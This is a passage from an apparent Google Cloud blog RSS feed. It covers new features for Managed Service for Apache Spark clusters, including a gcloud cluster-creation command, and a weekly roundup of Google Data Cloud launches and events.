&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Build and orchestrate pipelines:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Author multi-node data pipelines and generate comprehensive code documentation using natural language.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Perform real-time debugging: &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;Leverage Gemini Cloud Assist to sift through executor logs, pinpoint root causes of job failures, and recommend actionable fixes.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Easily connect to Spark resources: &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;Instantly attach to serverless Spark runtimes or managed clusters without manual network configuration or local Spark installations.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Streamline Git and CI/CD management:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Commit, merge, and deploy code directly from your IDE of choice, triggering automated testing and deployment pipelines without friction.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Smarter: Next-generation Lakehouse &lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;We recently launched &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/lakehouse/docs/introduction"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Lakehouse&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, which delivers read/write interoperability between engines like Managed Service for Apache Spark and BigQuery. By leveraging the &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/lakehouse/docs/about-lakehouse-catalogs"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Lakehouse runtime catalog&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; as a unified, serverless metadata layer, it removes data silos and the need for complex translation layers. This agentic-first approach allows organizations to process open formats directly from Google Cloud Storage, or even query remote AWS datasets using the newly introduced &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/lakehouse/docs/about-cross-cloud-lakehouse"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;cross-cloud Lakehouse&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, all while maintaining a single source of truth for security and governance.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;For customers utilizing Managed Spark clusters, this integration unlocks several powerful new capabilities. Data teams can now accelerate their most demanding ETL and data science workloads by up to 4.9x using the optimized Lightning Engine.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "
      &gt;

      
      
        
        &lt;img
            src="https://storage.googleapis.com/gweb-cloudblog-publish/images/4_ywa0kAz.max-1000x1000.png"
        
          alt="4"&gt;
        
        &lt;/a&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Next-gen runtimes: Cluster Image 3.0 with Spark 4.1&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Keeping pace with the open-source ecosystem, we rolled out &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/dataproc/docs/release-notes#May_03_2026"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Cluster Image 3.0&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; in preview, built with Apache Spark 4.1 and that features an upgraded default Java runtime, Java 21. Spark 4.1 introduces a set of core open-source capabilities, including real-time mode for structured streaming. This enables your Spark environment to support real-time streaming with continuous, sub-second latency processing.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Get started today&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;These updates are live and ready to use today in Managed Spark clusters! You can enable these new features directly through the Google Cloud console or via the &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;gcloud&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; CLI.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To spin up a new Managed Cluster and natively unlocking the performance of &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;Lightning Engine,&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; run the following command in your terminal:&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;gcloud dataproc clusters create my-optimized-cluster \\\r\n    --region=us-central1 \\\r\n    --image-version=2.3 \\\r\n    --engine=lightning \\&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7fe9d1eb1580&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Alternatively, navigate to the &lt;/span&gt;&lt;a href="https://console.cloud.google.com/dataproc"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Managed Service for Apache Spark page in the console&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, click Create cluster, and select ‘Enable Lightning Engine’ under the cluster configuration settings to automatically activate Lightning Engine for your Spark jobs. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;We look forward to hearing about the environments you build and run as Managed Service for Apache Spark clusters!&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;</description><pubDate>Thu, 04 Jun 2026 16:00:00 +0000</pubDate><guid>https://cloud.google.com/blog/products/data-analytics/enhancements-to-managed-service-for-apache-spark-clusters/</guid><category>AI &amp; Machine Learning</category><category>Streaming</category><category>Open Source</category><category>Data Analytics</category><og xmlns:og="http://ogp.me/ns#"><type>article</type><title>What's new for Managed Service for Apache Spark clusters</title><description></description><site_name>Google</site_name><url>https://cloud.google.com/blog/products/data-analytics/enhancements-to-managed-service-for-apache-spark-clusters/</url></og><author xmlns:author="http://www.w3.org/2005/Atom"><name>Qiqi Wu</name><title>Senior Product Manager, Google Cloud</title><department></department><company></company></author></item><item><title>What’s new with Google Data Cloud</title><link>https://cloud.google.com/blog/products/data-analytics/whats-new-with-google-data-cloud/</link><description>&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;June 1 - June 5&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;ul&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Beyond the Query: Powering AI Agents with Bigtable, Firestore &amp;amp; Memorystore &lt;br/&gt;&lt;/strong&gt;&lt;span style="font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen, Ubuntu, Cantarell, 'Open Sans', 'Helvetica Neue', sans-serif;"&gt;Discover the latest advancements in Google Cloud's NoSQL Database portfolio, including Bigtable, Firestore, and Memorystore. This series is designed for a broad audience: whether you are exploring these databases for the first time or are an existing user looking to leverage the new capabilities announced at Next '26. &lt;br/&gt;&lt;br/&gt;&lt;/span&gt;&lt;a href="https://rsvp.withgoogle.com/events/beyond-the-query-powering-ai-agents-with-bigtable-firestore-memorystore" rel="noopener" style="font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen, Ubuntu, Cantarell, 'Open Sans', 'Helvetica Neue', sans-serif;" target="_blank"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Register here to secure your spot!&lt;/strong&gt;&lt;/a&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;ul&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Cloud Engineer's AI Toolkit Workshops: &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;Solve data-driven challenges with &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;BigQuery, AlloyDB&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;Gemini&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; and more. &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;Hosted by Google Cloud Labs, this highly technical event is built specifically for Platform Engineers, SREs, and cloud infrastructure teams ready to bridge the gap between AI prototypes and production-grade deployments. Look out for more locations coming soon&lt;br/&gt;&lt;br/&gt;&lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;Toronto&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; - June 25 (Data Cloud) | &lt;/span&gt;&lt;a href="https://rsvp.withgoogle.com/events/google-cloud-labs-data-cloud-toronto" rel="noopener" style="font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen, Ubuntu, Cantarell, 'Open Sans', 'Helvetica Neue', sans-serif;" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;RSVP Here&lt;/span&gt;&lt;/a&gt;&lt;br/&gt;&lt;strong style="vertical-align: baseline;"&gt;Chicago&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; - June 30 (Data Cloud) | &lt;/span&gt;&lt;a href="https://rsvp.withgoogle.com/events/google-cloud-labs-data-cloud-chicago" rel="noopener" style="font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen, Ubuntu, Cantarell, 'Open Sans', 'Helvetica Neue', sans-serif;" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;RSVP Here&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Start a 10-day &lt;/strong&gt;&lt;a href="https://cloud.google.com/bigtable"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Bigtable&lt;/strong&gt;&lt;/a&gt;&lt;strong style="vertical-align: baseline;"&gt; free trial with a 1 node SSD cluster and up to 500GB of storage capacity. &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;W&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;ith no credit card required to start, you can easily ingest workloads and manage workloads that require low-latency, high-throughput, and predictable access. &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;Plus, new Google Cloud customers get &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/sql/docs/mysql/create-free-trial-instance"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;$300 in free credits&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; on signup.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;May 11 - May 15&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Managed Service for Apache Airflow&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; has launched a wave of new features, including the general availability of Airflow 3.1, AI-powered agentic troubleshooting, a new managed Airflow MCP Server for custom agent integration, and declarative YAML-based orchestration pipelines—discover all the details in the&lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/data-analytics/managed-apache-airflow-scaling-data-and-ai-workloads"&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;full blog post&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;April 20 - April 24&lt;/span&gt;&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Google-built ODBC Driver for BigQuery is now available in Preview&lt;br/&gt;&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;We are excited to announce the launch of the new, Google-built ODBC driver for BigQuery. This new open-source driver provides a direct, high-performance connection for applications to BigQuery and is developed entirely in-house by Google. &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/bigquery/docs/odbc-for-bigquery"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Download a new driver and connect your application to BigQuery&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;April 13 - April 17&lt;/span&gt;&lt;/h3&gt;
&lt;ul&gt;
&lt;li role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;We announced &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/data-analytics/looker-studio-is-data-studio"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;we are reintroducing Data Studio&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; to play a significant role in the AI era, expanding from data visualizations and reports to host BigQuery conversational agents and data apps built in Colab notebooks.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;We announced &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/data-analytics/introducing-bigquery-graph"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;BigQuery Graph is now available in preview&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, offering an easy-to-use, highly scalable graph analytics solution, empowering data professionals to model, analyze and visualize massive-scale relationships in an entirely new way. &lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;April 6 - April 10&lt;/span&gt;&lt;/h3&gt;
&lt;ul&gt;
&lt;li role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;We introduced &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/business-intelligence/looker-embedded-adds-conversational-analytics"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Conversational Analytics for Looker Embedded environments&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, enabling users to add natural language experiences to their own custom data-driven applications, powered by Gemini. &lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;We expanded Looker’s capabilities for faster ad-hoc analysis, with the &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/business-intelligence/looker-self-service-explores"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;introduction of self-service Explores&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, enabling you to bring your own data to Looker’s semantic layer and gain instant access to insights in a governed data environment.&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;March 23 - March 27&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;ul&gt;
&lt;li role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;We showed you how you can &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/databases/cloudsql-read-pools-support-autoscaling"&gt;&lt;span style="vertical-align: baseline;"&gt;scale your reads with Cloud SQL autoscaling read pools.&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; This feature allows you to provision multiple read replicas that are accessible via a single read endpoint and to dynamically adjust your read capability based on real-time application needs. &lt;/span&gt;&lt;/li&gt;
&lt;li role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Our customers are leveraging the full power of Conversational Analytics and Looker to drive major business and technical breakthroughs in the AI era. Companies like &lt;/span&gt;&lt;a href="https://cloud.google.com/customers/telenor-looker"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Telenor&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;a href="https://cloud.google.com/customers/petcircle-looker"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Pet Circle&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;a href="https://cloud.google.com/customers/fluent-commerce"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Fluent Commerce&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;a href="https://cloud.google.com/customers/lighthouse"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Lighthouse Intelligence&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;a href="https://cloud.google.com/customers/wego"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Wego&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, and &lt;/span&gt;&lt;a href="https://cloud.google.com/customers/roller"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;ROLLER&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; are turning data into insights and actions, grounded by Looker’s semantic layer.&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;March 16 - March 20&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;We introduced &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/data-analytics/gemini-supercharges-the-bigquery-studio-assistant"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;an enhanced Gemini assistant in BigQuery Studio&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, transforming the agent from a code assistant into a fully context-aware analytics partner.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;February 23 - February 27&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;ul&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;We introduced &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/databases/managed-mcp-servers-for-google-cloud-databases"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;managed and remote MCP support for Google Cloud databases&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, including AlloyDB, Spanner, Cloud SQL, Bigtable and Firestore, to power the next generation of agents. This announcement extends the ability for AI models to plan, build, and solve complex problems, connecting to the database tools our customers leverage daily as the backbone of their work environment.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;We outlined how you can &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/data-analytics/build-data-agents-with-conversational-analytics-api"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;build a conversational agent in BigQuery using the Conversational Analytics API&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; to help you build context-aware agents that can understand natural language, query your BigQuery data, and deliver answers in text, tables, and visual charts.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;February 16 - February 20&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Our customers are leveraging the full power of Looker to drive major business and technical breakthroughs. Companies like &lt;/span&gt;&lt;a href="https://cloud.google.com/customers/arrive"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Arrive&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;a href="https://cloud.google.com/customers/audika"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Audika&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;a href="https://cloud.google.com/customers/looker-carousell"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Carousell&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;a href="https://cloud.google.com/customers/framebridge"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Framebridge&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;a href="https://cloud.google.com/customers/gumgum"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;GumGum&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;a href="https://cloud.google.com/customers/intel-looker"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Intel&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;a href="https://cloud.google.com/customers/overdose-digital"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Overdose Digital&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;a href="https://cloud.google.com/customers/one-looker"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Ocean Network Express&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;a href="https://cloud.google.com/customers/subskribe"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Subskribe&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; and &lt;/span&gt;&lt;a href="https://cloud.google.com/customers/promevo-looker"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Promevo&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; are leveraging Looker’s newest AI-driven capabilities, including Conversational Analytics, to transform data to insights and actions, and empower their entire organization with a single source of truth, powered by Looker’s semantic layer.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;February 2 - February 6&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Join us on March 4 for our webinar, Win Your AI Strategy with Cloud SQL Enterprise Plus, to learn how to power your generative AI workloads with 3x higher performance and 99.99% availability. &lt;/span&gt;&lt;a href="https://rsvp.withgoogle.com/events/win-your-ai-strategy-with-cloud-sql-enterprise-plus" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Register today&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; to discover how to build a scalable, enterprise-grade foundation for your most demanding AI applications.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;January 26 - January 30&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;ul&gt;
&lt;li role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;We introduced &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/data-analytics/introducing-conversational-analytics-in-bigquery"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Conversational Analytics in BigQuery&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;, which allows users to analyze data using natural language.&lt;/span&gt;&lt;/a&gt; &lt;span style="vertical-align: baseline;"&gt;Conversational Analytics in BigQuery is an intelligent agent that generates, executes and visualizes answers grounded in your business context directly in BigQuery Studio, making data insights for data professionals more conversational.&lt;/span&gt;&lt;/li&gt;
&lt;li role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;We outlined how &lt;/span&gt;&lt;a href="https://cloud.google.com/transform/from-asset-to-action-how-data-products-have-become-the-foundation-for-ai-agents"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;data products have become the foundation for AI agents&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, providing the context needed to make autonomous agents reliable and trusted for real business use, backed by organized business logic and semantic understanding.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;We highlighted how &lt;/span&gt;&lt;a href="https://cloud.google.com/use-cases/data-analytics-agents"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;you can supercharge data analytics workflows&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, and outlined Google Cloud’s AI agent offerings for data engineering, data science, and development tools, so you can integrate agentic workflows in your applications, empower your teams and speed discovery.&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;January 19 - January 23&lt;/span&gt;&lt;/h3&gt;
&lt;ul&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
